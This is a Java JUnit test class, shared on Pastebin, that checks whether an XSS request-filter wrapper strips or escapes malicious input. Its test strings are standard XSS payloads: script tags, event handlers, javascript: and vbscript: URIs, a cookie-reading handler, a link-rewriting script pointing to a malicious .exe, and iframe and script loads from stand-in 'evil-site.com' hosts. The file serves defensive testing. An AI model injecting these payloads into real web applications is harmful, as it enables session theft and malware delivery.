API tools faq
paste
Advertisement
Guest User

GarciaPL

a guest
Dec 5th, 2015
113
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 7.10 KB | None | 0 0
raw download clone embed print report
  1. package pl.garciapl.xss;
  2.  
  3. import org.junit.Before;
  4. import org.junit.Test;
  5. import org.junit.runner.RunWith;
  6. import org.springframework.mock.web.MockHttpServletRequest;
  7. import org.springframework.test.context.ContextConfiguration;
  8. import org.springframework.test.context.junit4.SpringJUnit4ClassRunner;
  9. import org.springframework.web.context.request.RequestContextHolder;
  10. import org.springframework.web.context.request.ServletRequestAttributes;
  11.  
  12. import javax.servlet.ServletException;
  13. import javax.servlet.http.Cookie;
  14. import java.io.IOException;
  15.  
  16. import static org.junit.Assert.assertEquals;
  17.  
  18. @RunWith(SpringJUnit4ClassRunner.class)
  19. @ContextConfiguration(locations = {"classpath:applicationContext-test.xml"})
  20. public class XSSRequestWrapperTest {
  21.  
  22.     private XSSRequestWrapper xssRequestWrapper;
  23.     private MockHttpServletRequest request;
  24.  
  25.     @Before
  26.     public void setUp() throws ServletException {
  27.         request = new MockHttpServletRequest();
  28.         request.setCookies(new Cookie("myJSESSIONID", "1"));
  29.         RequestContextHolder.setRequestAttributes(new ServletRequestAttributes(request));
  30.     }
  31.  
  32.     @Test
  33.     public void testXSSFilterAlert() throws IOException, ServletException {
  34.         String dirty = "Site.com/search.php?search=<script>alert(\"XSS\");</script>";
  35.         request.setParameter(dirty, dirty);
  36.         xssRequestWrapper = new XSSRequestWrapper(request);
  37.         String parameter = xssRequestWrapper.getParameter(dirty);
  38.         assertEquals("Site.com/search.php?search=", parameter);
  39.     }
  40.  
  41.     @Test
  42.     public void testXSSFilterAlertSecond() throws IOException, ServletException {
  43.         String dirty = "http://example.com/index.php?user=<script>alert(123)</script>&p=123";
  44.         request.setParameter(dirty, dirty);
  45.         xssRequestWrapper = new XSSRequestWrapper(request);
  46.         String parameter = xssRequestWrapper.getParameter(dirty);
  47.         assertEquals("http://example.com/index.php?user=&amp;p=123", parameter);
  48.     }
  49.  
  50.     @Test
  51.     public void testXSSFilterAlertThird() throws IOException, ServletException {
  52.         String dirty = "http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName(\\\"a\\\"); AllLinks[0].href = \\\"http://badexample.com/malicious.exe\\\"; }</script> ";
  53.         request.setParameter(dirty, dirty);
  54.         xssRequestWrapper = new XSSRequestWrapper(request);
  55.         String parameter = xssRequestWrapper.getParameter(dirty);
  56.         assertEquals("http://example.com/index.php?user=", parameter);
  57.     }
  58.  
  59.     @Test
  60.     public void testXSSFilterAlertFourth() throws IOException, ServletException {
  61.         String dirty = "\" onfocus=\"alert(document.cookie)";
  62.         request.setParameter(dirty, dirty);
  63.         xssRequestWrapper = new XSSRequestWrapper(request);
  64.         String parameter = xssRequestWrapper.getParameter(dirty);
  65.         assertEquals("\" onfocus=\"alert(document.cookie)", parameter);
  66.     }
  67.  
  68.     @Test
  69.     public void testXSSFilterAlertFifth() throws IOException, ServletException {
  70.         String dirty = "<b onmouseover=alert('Wufff!')>click me!</b>";
  71.         request.setParameter(dirty, dirty);
  72.         xssRequestWrapper = new XSSRequestWrapper(request);
  73.         String parameter = xssRequestWrapper.getParameter(dirty);
  74.         assertEquals("click me!", parameter);
  75.     }
  76.  
  77.     @Test
  78.     public void testXSSFilterIFrame() throws IOException, ServletException {
  79.         String dirty = "<iframe src=http://evil-site.com/evil.html ";
  80.         request.setParameter(dirty, dirty);
  81.         xssRequestWrapper = new XSSRequestWrapper(request);
  82.         String parameter = xssRequestWrapper.getParameter(dirty);
  83.         assertEquals("", parameter);
  84.     }
  85.  
  86.     @Test
  87.     public void testXSSFilterAlertBody() throws IOException, ServletException {
  88.         String dirty = "<BODY BACKGROUND=\"javascript:alert('XSS')\"> ";
  89.         request.setParameter(dirty, dirty);
  90.         xssRequestWrapper = new XSSRequestWrapper(request);
  91.         String parameter = xssRequestWrapper.getParameter(dirty);
  92.         assertEquals("", parameter);
  93.     }
  94.  
  95.     @Test
  96.     public void testXSSFilterAlertLink() throws IOException, ServletException {
  97.         String dirty = "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">";
  98.         request.setParameter(dirty, dirty);
  99.         xssRequestWrapper = new XSSRequestWrapper(request);
  100.         String parameter = xssRequestWrapper.getParameter(dirty);
  101.         assertEquals("", parameter);
  102.     }
  103.  
  104.     @Test
  105.     public void testXSSFilterAlertMeta() throws IOException, ServletException {
  106.         String dirty = "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">";
  107.         request.setParameter(dirty, dirty);
  108.         xssRequestWrapper = new XSSRequestWrapper(request);
  109.         String parameter = xssRequestWrapper.getParameter(dirty);
  110.         assertEquals("", parameter);
  111.     }
  112.  
  113.     @Test
  114.     public void testXSSFilterAlertVBScript() throws IOException, ServletException {
  115.         String dirty = "<IMG SRC='vbscript:msgbox(\"XSS\")'>";
  116.         request.setParameter(dirty, dirty);
  117.         xssRequestWrapper = new XSSRequestWrapper(request);
  118.         String parameter = xssRequestWrapper.getParameter(dirty);
  119.         assertEquals("", parameter);
  120.     }
  121.  
  122.     @Test
  123.     public void testXSSFilterAlertImage() throws IOException, ServletException {
  124.         String dirty = "<img src=\"javascript:alert('XSS');\">";
  125.         request.setParameter(dirty, dirty);
  126.         xssRequestWrapper = new XSSRequestWrapper(request);
  127.         String parameter = xssRequestWrapper.getParameter(dirty);
  128.         assertEquals("", parameter);
  129.     }
  130.  
  131.     @Test
  132.     public void testXSSFilterAlertScript() throws IOException, ServletException {
  133.         String dirty = "<script>alert('attack');</script>";
  134.         request.setParameter(dirty, dirty);
  135.         xssRequestWrapper = new XSSRequestWrapper(request);
  136.         String parameter = xssRequestWrapper.getParameter(dirty);
  137.         assertEquals("", parameter);
  138.     }
  139.  
  140.     @Test
  141.     public void testXSSFilterAlertScriptSecond() throws IOException, ServletException {
  142.         String dirty = "<SCRIPT>x=/XSS/  alert(x.source)</SCRIPT>";
  143.         request.setParameter(dirty, dirty);
  144.         xssRequestWrapper = new XSSRequestWrapper(request);
  145.         String parameter = xssRequestWrapper.getParameter(dirty);
  146.         assertEquals("", parameter);
  147.     }
  148.  
  149.     @Test
  150.     public void testXSSFilterAlertScriptThird() throws IOException, ServletException {
  151.         String dirty = "<SCRIPT SRC=http://evil-site.com/xss.js> </SCRIPT>";
  152.         request.setParameter(dirty, dirty);
  153.         xssRequestWrapper = new XSSRequestWrapper(request);
  154.         String parameter = xssRequestWrapper.getParameter(dirty);
  155.         assertEquals("", parameter);
  156.     }
  157.  
  158.     @Test
  159.     public void testXSSFilterEscaping() throws IOException, ServletException {
  160.         String dirty = "&, <, >, , , /.";
  161.         request.setParameter(dirty, dirty);
  162.         xssRequestWrapper = new XSSRequestWrapper(request);
  163.         String parameter = xssRequestWrapper.getParameter(dirty);
  164.         assertEquals("&amp;, &lt;, &gt;, , , /.", parameter);
  165.     }
  166. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!